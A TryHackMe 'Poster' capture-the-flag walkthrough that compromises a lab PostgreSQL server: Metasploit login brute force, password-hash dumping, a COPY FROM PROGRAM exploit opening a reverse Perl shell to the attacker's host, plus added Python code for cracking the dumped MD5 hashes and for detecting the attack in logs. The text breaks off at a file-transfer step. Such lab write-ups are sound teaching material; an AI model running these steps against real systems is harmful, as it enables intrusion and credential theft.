THM Writeup – Poster

The sysadmin set up an RDBMS in a safe way.

Room: Poster

Difficulty: Easy

Operating System: Linux

Author: stuxnet

What is an RDBMS?

An RDBMS is built on E. F. Codd's relational model: it lets users create, update, manage and query a relational database, which stores data in tables.

Today most companies use relational databases rather than flat files or hierarchical databases to store business data, because a relational database handles a wide range of data types and answers queries efficiently. It organizes data into tables that can be joined on common columns, so a single query can retrieve data from one or more tables. A flat file, by contrast, keeps everything in a single table structure, which is less efficient and uses more space and memory.

Most RDBMSs in commercial use today are accessed through Structured Query Language (SQL). They are mostly used for CRUD operations (create, read, update and delete), which are the basis of consistent data management.

Are you able to complete the challenge?

Add the target's IP address to your hosts file (this needs root, which the attacking machine here is running as):

echo '10.10.35.173    poster.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv poster.thm

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
[REDACTED]/tcp open  postgresql syn-ack ttl 64

What is the rdbms installed on the server?

What port is the rdbms running on?

Get more details about open ports:

nmap -T4 -A -p 22,80,5432 poster.thm

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
|   256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_  256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (EdDSA)
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Poster CMS
[REDACTED]/tcp open  [REDACTED] [REDACTED] DB
| fingerprint-strings: 
|   SMBProgNeg: 
|     SFATAL
|     C0A000
|     Munsupported frontend protocol 65363.19778: server supports 1.0 to 3.0
|     Fpostmaster.c
|     L2015
|_    RProcessStartupPacket
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after:  2030-07-27T00:54:25
|_ssl-date: TLS randomness does not represent time
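The fingerprint-strings block above is worth understanding, because it is how nmap recognises PostgreSQL without a banner. The server treats whatever arrives first on the socket as a StartupMessage (int32 length, int32 protocol version, key/value pairs) and, when it cannot make sense of it, answers with an ErrorResponse. nmap's SMBProgNeg probe starts with the SMB signature \xff S M B right where the protocol version field sits, and read as two big-endian 16-bit integers that is 0xFF53.0x4D42 = 65363.19778, which is exactly the "unsupported frontend protocol" the server complains about. The following is an added example (not code from the original writeup or from nmap) that frames a real StartupMessage and decodes the server's first reply, so you can also learn which password method (MD5, cleartext or SCRAM) a server demands before touching Metasploit. The probe() function talks to the network; the parsers are exercised offline on a constructed copy of the page's error message. Host, user and database names are assumptions.

```python
import socket
import struct

PG_PROTOCOL_3_0 = (3 << 16) | 0  # major 3, minor 0 -> 196608

AUTH_CODES = {0: "AuthenticationOk", 3: "CleartextPassword",
              5: "MD5Password", 10: "SASL (SCRAM-SHA-256)"}


def build_startup_message(user, database="template1"):
    """Frame a protocol-3.0 StartupMessage: int32 length (including itself),
    int32 version, NUL-terminated key/value pairs, then a final NUL."""
    body = b"".join(k.encode() + b"\0" + v.encode() + b"\0"
                    for k, v in (("user", user), ("database", database)))
    payload = struct.pack("!I", PG_PROTOCOL_3_0) + body + b"\0"
    return struct.pack("!I", len(payload) + 4) + payload


def build_error_response(fields):
    """Frame a backend ErrorResponse ('E'): one-byte field code plus text,
    each NUL-terminated, list ended by a NUL. Used here to construct test input."""
    body = b"".join(code.encode() + text.encode() + b"\0" for code, text in fields) + b"\0"
    return b"E" + struct.pack("!I", len(body) + 4) + body


def parse_backend_message(data):
    """Decode the first backend message: type byte, int32 length, body."""
    mtype = data[0:1]
    (length,) = struct.unpack("!I", data[1:5])
    body = data[5:1 + length]
    if mtype == b"E":
        fields = {}
        for field in body.split(b"\0"):
            if field:
                fields[chr(field[0])] = field[1:].decode("utf-8", "replace")
        return {"type": "ErrorResponse", "fields": fields}
    if mtype == b"R":
        (code,) = struct.unpack("!I", body[:4])
        return {"type": "AuthenticationRequest", "code": code,
                "method": AUTH_CODES.get(code, "other")}
    return {"type": mtype.decode("ascii", "replace"), "length": length}


def version_field_of(probe_bytes):
    """How the server reads the first four payload bytes of a foreign probe:
    big-endian int16 major, int16 minor."""
    major, minor = struct.unpack("!HH", probe_bytes[:4])
    return f"{major}.{minor}"


def probe(host, port=5432, user="postgres", database="template1", timeout=5):
    """Send a StartupMessage and decode the first reply (needs network access)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_startup_message(user, database))
        return parse_backend_message(sock.recv(4096))


# Constructed copy of the ErrorResponse shown in the nmap output above.
NMAP_FINGERPRINT_ERROR = build_error_response([
    ("S", "FATAL"), ("C", "0A000"),
    ("M", "unsupported frontend protocol 65363.19778: server supports 1.0 to 3.0"),
    ("F", "postmaster.c"), ("L", "2015"), ("R", "ProcessStartupPacket"),
])

if __name__ == "__main__":
    print(parse_backend_message(NMAP_FINGERPRINT_ERROR))
    print(version_field_of(b"\xffSMB"))  # the SMB signature read as a PG version
    # probe("poster.thm")  # assumed host; uncomment on the lab network
```

Against a live server, probe() returns an AuthenticationRequest whose method tells you what postgres_login will be negotiating; an ErrorResponse with code 28000 instead means pg_hba.conf rejects your source address or database outright, and no amount of guessing will help.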

After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the module (starting with auxiliary)?

Start Metasploit:

msfconsole

Search for an associated auxiliary module that allows us to enumerate user credentials:

msf5 > grep auxiliary search postgres
   0   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   1   auxiliary/admin/http/rails_devise_pass_reset                2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   2   auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
   3   auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   4   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   5   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   6   auxiliary/scanner/postgres/postgres_hashdump                                 normal     No     Postgres Password Hashdump
-->7   auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   8   auxiliary/scanner/postgres/postgres_schemadump                               normal     No     Postgres Schema Dump
   9   auxiliary/scanner/postgres/postgres_version                                  normal     No     PostgreSQL Version Probe
   10  auxiliary/server/capture/postgresql

What are the credentials you found?

Select the module we found and display its options:

msf5 > use [NUMBER_REDACTED]
msf5 auxiliary([MODULNAME_REDACTED]) > show options

Module options ([MODULNAME_REDACTED]):

   Name              Current Setting                                                              Required  Description
   ----              ---------------                                                              --------  -----------
   BLANK_PASSWORDS   false                                                                        no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                            yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                    yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                        no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                        no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                        no        Add all users in the current database to the list
   PASSWORD                                                                                       no        A specific password to authenticate with
   PASS_FILE         /opt/metasploit-framework-5101/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                         no        Set to true to see query result sets
   RHOSTS                                                                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5432                                                                         yes       The target port
   STOP_ON_SUCCESS   false                                                                        yes       Stop guessing when a credential works for a host
   THREADS           1                                                                            yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                       no        A specific username to authenticate as
   USERPASS_FILE     /opt/metasploit-framework-5101/data/wordlists/postgres_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                        no        Try the username as the password for all users
   USER_FILE         /opt/metasploit-framework-5101/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true

Only RHOSTS needs to be set; the default wordlists (postgres_default_user.txt, postgres_default_pass.txt and postgres_default_userpass.txt) are enough for this box:

msf5 auxiliary([MODULNAME_REDACTED]) > set RHOSTS poster.thm
RHOSTS => poster.thm

Now run the module (for an auxiliary module, exploit is just an alias for run):

msf5 auxiliary([MODULNAME_REDACTED]) > exploit

[-] 10.10.35.173:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: Invalid username or password)
[+] 10.10.35.173:5432 - Login Successful: [REDACTED]@template1
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?

Search for a module that allows you to execute commands with the proper user credentials (starting with auxiliary):

msf5 auxiliary([MODULENAME_REDACTED]) > grep auxiliary search postgres
   0   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   1   auxiliary/admin/http/rails_devise_pass_reset                2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   2   auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
-->3   auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   4   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   5   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   6   auxiliary/scanner/postgres/postgres_hashdump                                 normal     No     Postgres Password Hashdump
   7   auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   8   auxiliary/scanner/postgres/postgres_schemadump                               normal     No     Postgres Schema Dump
   9   auxiliary/scanner/postgres/postgres_version                                  normal     No     PostgreSQL Version Probe
   10  auxiliary/server/capture/postgresql

Based on the results of #6, what is the rdbms version installed on the server?

Select the module and display its options:

msf5 auxiliary([MODULENAME_REDACTED]) > use [NUMBER_REDACTED]
msf5 auxiliary([MODULENAME_REDACTED]) > show options

Module options ([MODULENAME_REDACTED]):

   Name           Current Setting   Required  Description
   ----           ---------------   --------  -----------
   DATABASE       template1         yes       The database to authenticate against
   PASSWORD       postgres          no        The password for the specified username. Leave blank for a random password.
   RETURN_ROWSET  true              no        Set to true to see query result sets
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          5432              yes       The target port
   SQL            select version()  no        The SQL query to execute
   USERNAME       postgres          yes       The username to authenticate as
   VERBOSE        false             no        Enable verbose output

Set RHOSTS and PASSWORD:

msf5 auxiliary([MODULENAME_REDACTED]) > set RHOSTS poster.thm
RHOSTS => poster.thm
msf5 auxiliary([MODULENAME_REDACTED]) > set PASSWORD [REDACTED]
PASSWORD => [REDACTED]

Now run the module:

msf5 auxiliary([MODULENAME_REDACTED]) > run
[*] Running module against 10.10.35.173

Query Text: 'select version()'
==============================

    version
    -------
    PostgreSQL [REDACTED] on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit

[*] Auxiliary module execution completed

What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?

Search for a module that allows for dumping user hashes (starting with auxiliary):

msf5 auxiliary([MODULENAME_REDACTED]) > grep auxiliary search postgres
   0   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   1   auxiliary/admin/http/rails_devise_pass_reset                2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   2   auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
   3   auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   4   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   5   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
-->6   auxiliary/scanner/postgres/postgres_hashdump                                 normal     No     Postgres Password Hashdump
   7   auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   8   auxiliary/scanner/postgres/postgres_schemadump                               normal     No     Postgres Schema Dump
   9   auxiliary/scanner/postgres/postgres_version                                  normal     No     PostgreSQL Version Probe
   10  auxiliary/server/capture/postgresql

How many user hashes does the module dump?

Again, select the module and display its options:

msf5 auxiliary([MODULENAME_REDACTED]) > use [NUMBER_REDACTED]
msf5 auxiliary([MODULENAME_REDACTED]) > show options

Module options ([MODULENAME_REDACTED]):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  postgres         yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  postgres         yes       The username to authenticate as

Set RHOSTS and PASSWORD:

msf5 auxiliary([MODULENAME_REDACTED]) > set RHOSTS poster.thm
RHOSTS => poster.thm
msf5 auxiliary([MODULENAME_REDACTED]) > set PASSWORD [REDACTED]
PASSWORD => [REDACTED]

Run the module:

msf5 auxiliary([MODULENAME_REDACTED]) > run

[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================

 Username   Hash
 --------   ----
 darkstart  md58842b99375db43e9fdf238753623a27d
 poster     md578fb805c7412ae597b399844a54cce0a
 postgres   md532e12f215ba27cb750c9e093ce4b5127
 sistemas   md5f7dbc0d5a06653e74da6b1af9290ee2b
 ti         md57af9ac4c593e9e4f275576e13f935579
 tryhackme  md503aab1165001c8f8ccae31a8824efddc

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
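The hashes above are PostgreSQL's legacy MD5 format, which is "md5" followed by hex(md5(password || username)): the role name is the only salt, so cracking is cheap and a given password hashes identically for the same role on every server. The block below is an added example (not part of the original writeup and not Metasploit code) that parses the table exactly as the module prints it (a constructed copy of the six rows above is embedded as sample input), reproduces the hash computation, runs an offline dictionary attack and emits hashcat -m 12 lines. The wordlist in the usage section is constructed; the box's real passwords are not on this page, so no result is claimed for them.

```python
import hashlib
import re

# Constructed copy of the table printed by postgres_hashdump above; sample input only.
HASHDUMP_OUTPUT = """\
 Username   Hash
 --------   ----
 darkstart  md58842b99375db43e9fdf238753623a27d
 poster     md578fb805c7412ae597b399844a54cce0a
 postgres   md532e12f215ba27cb750c9e093ce4b5127
 sistemas   md5f7dbc0d5a06653e74da6b1af9290ee2b
 ti         md57af9ac4c593e9e4f275576e13f935579
 tryhackme  md503aab1165001c8f8ccae31a8824efddc
"""

ROW_RE = re.compile(r"^\s*(\S+)\s+(md5[0-9a-f]{32})\s*$", re.M)


def parse_hashdump(text):
    """Return {username: hash} from the module's table output; header rows and
    SCRAM hashes (which do not start with md5) are ignored."""
    return dict(ROW_RE.findall(text))


def pg_md5(username, password):
    """PostgreSQL's legacy password hash: 'md5' + hex(md5(password + username)).
    The username is the only salt."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()


def crack(hashes, wordlist):
    """Offline dictionary attack on a {username: hash} map; returns the hits."""
    found = {}
    for user, target in hashes.items():
        for candidate in wordlist:
            if pg_md5(user, candidate) == target:
                found[user] = candidate
                break
    return found


def to_hashcat(hashes):
    """Lines for hashcat -m 12 (PostgreSQL): hex digest, then the username as salt."""
    return [f"{h[3:]}:{user}" for user, h in hashes.items()]


if __name__ == "__main__":
    dumped = parse_hashdump(HASHDUMP_OUTPUT)
    print(len(dumped), "hashes dumped")
    # Constructed wordlist; whatever it hits (if anything) is computed, not assumed.
    print(crack(dumped, ["postgres", "password", "admin", "tiger"]))
    print("\n".join(to_hashcat(dumped)))
```

Two caveats when you meet this on a real engagement: servers from PostgreSQL 10 on can store SCRAM-SHA-256 verifiers (the default since 14), which look like SCRAM-SHA-256$4096:..., are salted per role and need a different, far slower cracking mode; and because postgres_hashdump reads pg_shadow it only works for a superuser, which is a second reason the postgres account matters so much here.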

What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?

Search for a module (starting with auxiliary) that allows an authenticated user to view files. postgres_readfile loads the file with COPY ... FROM a server-side path into a temporary table, which PostgreSQL only allows for superusers (or, from version 11, members of pg_read_server_files):

msf5 auxiliary([MODULENAME_REDACTED]) > grep auxiliary search postgres
   0   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   1   auxiliary/admin/http/rails_devise_pass_reset                2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
-->2   auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
   3   auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   4   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   5   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   6   auxiliary/scanner/postgres/postgres_hashdump                                 normal     No     Postgres Password Hashdump
   7   auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   8   auxiliary/scanner/postgres/postgres_schemadump                               normal     No     Postgres Schema Dump
   9   auxiliary/scanner/postgres/postgres_version                                  normal     No     PostgreSQL Version Probe
   10  auxiliary/server/capture/postgresql

What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?

Search for a module that allows arbitrary command execution with the proper user credentials (starting with exploit):

msf5 auxiliary([MODULENAME_REDACTED]) > grep exploit search postgres
   11  exploit/linux/postgres/postgres_payload                     2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   12  exploit/multi/http/manage_engine_dc_pmp_sqli                2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
-->13  exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   14  exploit/multi/postgres/postgres_createlang                  2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   15  exploit/windows/misc/manageengine_eventlog_analyzer_rce     2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Execution
   16  exploit/windows/postgres/postgres_payload                   2009-04-10

Compromise the machine and locate user.txt

Select the module and display its options. COPY ... FROM PROGRAM (available since PostgreSQL 9.3) runs the command as the postgres OS user and is restricted to superusers (or, from version 11, members of pg_execute_server_program); the module's default USERNAME postgres is the bootstrap superuser, which is why this works:

msf5 auxiliary([MODULENAME_REDACTED]) > use [NUMBER_REDACTED]
[*] Using configured payload cmd/unix/reverse_perl
msf5 exploit([MODULENAME_REDACTED]) > show options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           template1        yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from table (For Debugging)
   PASSWORD           postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          u6XtFEis1x       yes       A table name that does not exist (To avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Set RHOSTS, LHOST and PASSWORD:

msf5 exploit([MODULENAME_REDACTED]) > set RHOSTS poster.thm
RHOSTS => poster.thm
msf5 exploit([MODULENAME_REDACTED]) > set LHOST 10.10.137.243
LHOST => 10.10.137.243
msf5 exploit([MODULENAME_REDACTED]) > set PASSWORD [REDACTED]
PASSWORD => [REDACTED]

Now run the exploit:

msf5 exploit([MODULENAME_REDACTED]) > exploit

[*] Started reverse TCP handler on 10.10.137.243:4444 
[*] 10.10.35.173:5432 - 10.10.35.173:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.35.173:5432 - Exploiting...
[+] 10.10.35.173:5432 - 10.10.35.173:5432 - u6XtFEis1x dropped successfully
[+] 10.10.35.173:5432 - 10.10.35.173:5432 - u6XtFEis1x created successfully
[+] 10.10.35.173:5432 - 10.10.35.173:5432 - u6XtFEis1x copied successfully(valid syntax/command)
[+] 10.10.35.173:5432 - 10.10.35.173:5432 - u6XtFEis1x dropped successfully(Cleaned)
[*] 10.10.35.173:5432 - Exploit Succeeded
[*] Command shell session 1 opened (10.10.137.243:4444 -> 10.10.35.173:56678) at 2022-02-07 09:29:02 +0000

id
uid=109(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)
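Everything done so far leaves a distinctive trail in the PostgreSQL server log, which is the defender's side of this room: postgres_login produces a burst of "password authentication failed" FATAL lines (always logged, whatever the settings), and the COPY FROM PROGRAM module produces a DROP TABLE / CREATE TABLE / COPY ... FROM PROGRAM / DROP TABLE sequence that shows up only if log_statement is set to 'mod' or 'all' (the default 'none' hides it). The following is an added example, not part of the original writeup, that runs both detections over a constructed sample log; the timestamps, pids and payload in the sample are made up, the message texts are PostgreSQL's own, and the prefix format assumed is log_line_prefix = '%t [%p-%l] %q%u@%d ' (the Debian/Ubuntu packaging default), with log_connections on for the "connection authorized" line.

```python
import re
from datetime import datetime

# Assumed log_line_prefix = '%t [%p-%l] %q%u@%d ' (the Debian/Ubuntu packaging default).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[(?P<pid>\d+)-\d+\] "
    r"(?:(?P<user>[^@\s]+)@(?P<db>\S+) )?(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
AUTH_FAIL_RE = re.compile(r'password authentication failed for user "([^"]+)"')
COPY_PROGRAM_RE = re.compile(r"\bCOPY\s+\S+\s+FROM\s+PROGRAM\b", re.I)

# Constructed sample log: timestamps, pids and the payload are made up, but the
# message texts are what PostgreSQL emits for failed logins and, with
# log_statement = 'mod' or 'all', for the statements the exploit module runs.
SAMPLE_LOG = """\
2022-02-07 09:25:01 UTC [2401-1] postgres@template1 FATAL:  password authentication failed for user "postgres"
2022-02-07 09:25:01 UTC [2402-1] postgres@template1 FATAL:  password authentication failed for user "postgres"
2022-02-07 09:25:02 UTC [2403-1] scott@template1 FATAL:  password authentication failed for user "scott"
2022-02-07 09:25:02 UTC [2403-2] scott@template1 DETAIL:  Role "scott" does not exist.
2022-02-07 09:25:02 UTC [2404-1] scott@template1 FATAL:  password authentication failed for user "scott"
2022-02-07 09:25:03 UTC [2405-1] admin@template1 FATAL:  password authentication failed for user "admin"
2022-02-07 09:25:03 UTC [2406-1] admin@template1 FATAL:  password authentication failed for user "admin"
2022-02-07 09:29:01 UTC [2450-1] postgres@template1 LOG:  connection authorized: user=postgres database=template1
2022-02-07 09:29:02 UTC [2450-2] postgres@template1 LOG:  statement: DROP TABLE IF EXISTS u6XtFEis1x
2022-02-07 09:29:02 UTC [2450-3] postgres@template1 LOG:  statement: CREATE TABLE u6XtFEis1x(line text)
2022-02-07 09:29:02 UTC [2450-4] postgres@template1 LOG:  statement: COPY u6XtFEis1x FROM PROGRAM 'perl -MIO -e ...'
2022-02-07 09:29:02 UTC [2450-5] postgres@template1 LOG:  statement: DROP TABLE u6XtFEis1x
"""


def parse_line(line):
    """Split one log line into prefix fields, level and message; None for lines
    that do not carry the assumed prefix (e.g. wrapped continuation lines)."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    return rec


def detect(lines, fail_threshold=5, window_seconds=60):
    """Return (kind, timestamp, detail) alerts: a 'bruteforce' alert each time
    fail_threshold auth failures land inside a sliding window (lines are assumed
    to be in time order), and a 'copy_from_program' alert per logged COPY FROM PROGRAM."""
    alerts = []
    recent_fails = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        msg = rec["msg"]
        if rec["level"] == "FATAL" and AUTH_FAIL_RE.search(msg):
            recent_fails = [t for t in recent_fails
                            if (rec["when"] - t).total_seconds() <= window_seconds]
            recent_fails.append(rec["when"])
            if len(recent_fails) >= fail_threshold:
                alerts.append(("bruteforce", rec["ts"],
                               f"{len(recent_fails)} failed logins within {window_seconds}s"))
                recent_fails = []  # start counting afresh after alerting
        elif rec["level"] == "LOG" and msg.startswith("statement:") and COPY_PROGRAM_RE.search(msg):
            alerts.append(("copy_from_program", rec["ts"], f"user={rec['user']} db={rec['db']}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The failed-login burst alone would have flagged the run of postgres_login above; the COPY FROM PROGRAM line is the one that matters, and it is invisible unless statement logging is on, so on a server you defend, enabling log_statement = 'mod' (or at least alerting on any superuser session from an unexpected source address) is the practical mitigation this room illustrates.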

Look around a little bit:

ls -lA /home
total 8
drwxr-xr-x 4 alison alison 4096 Jul 28  2020 alison
drwxr-xr-x 2 dark   dark   4096 Jul 28  2020 dark

There are 2 users: alison and dark.

List alison’s home directory:

ls -lA /home/alison
total 32
-rw------- 1 alison alison 2444 Jul 28  2020 .bash_history
-rw-r--r-- 1 alison alison  220 Jul 28  2020 .bash_logout
-rw-r--r-- 1 alison alison 3771 Jul 28  2020 .bashrc
drwx------ 2 alison alison 4096 Jul 28  2020 .cache
drwxr-xr-x 2 alison alison 4096 Jul 28  2020 .nano
-rw-r--r-- 1 alison alison  655 Jul 28  2020 .profile
-rw-r--r-- 1 alison alison    0 Jul 28  2020 .sudo_as_admin_successful
-rw------- 1 alison alison   35 Jul 28  2020 user.txt
-rw-r--r-- 1 root   root    183 Jul 28  2020 .wget-hsts

We found the user flag, but we don't have permission to read it: user.txt is mode 600 and owned by alison, so we need to become alison. Note also .sudo_as_admin_successful, which Ubuntu's sudo creates the first time a user in the admin or sudo group runs a command successfully; alison very likely has sudo rights, which will matter later.

List dark’s home directory:

ls -lA /home/dark
total 20
-rw------- 1 dark dark   26 Jul 28  2020 .bash_history
-rw-r--r-- 1 dark dark  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 dark dark 3771 Aug 31  2015 .bashrc
-rwxrwxrwx 1 dark dark   24 Jul 28  2020 credentials.txt
-rw-r--r-- 1 dark dark  655 May 16  2017 .profile

There is an interestingly named file credentials.txt, and it is world-readable (mode 777); read it:

cat /home/dark/credentials.txt
dark:[REDACTED]

Great, these are credentials for dark's account; log in via SSH:

root@ip-10-10-137-243:~# ssh dark@poster.thm
The authenticity of host 'poster.thm (10.10.35.173)' can't be established.
ECDSA key fingerprint is SHA256:9sVne2iRYnXtCm1g5M0jwlzBMg0GmByloIG6c7gDlgA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'poster.thm,10.10.35.173' (ECDSA) to the list of known hosts.
dark@poster.thm's password: 
Last login: Tue Jul 28 20:27:25 2020 from 192.168.85.142
$ id
uid=1001(dark) gid=1001(dark) groups=1001(dark)
$ 

Now transfer the Linux enumeration script linpeas.sh to the target machine.

Start an HTTP server on your attacking machine:

root@ip-10-10-137-243:~# python3 -m http.server 8000
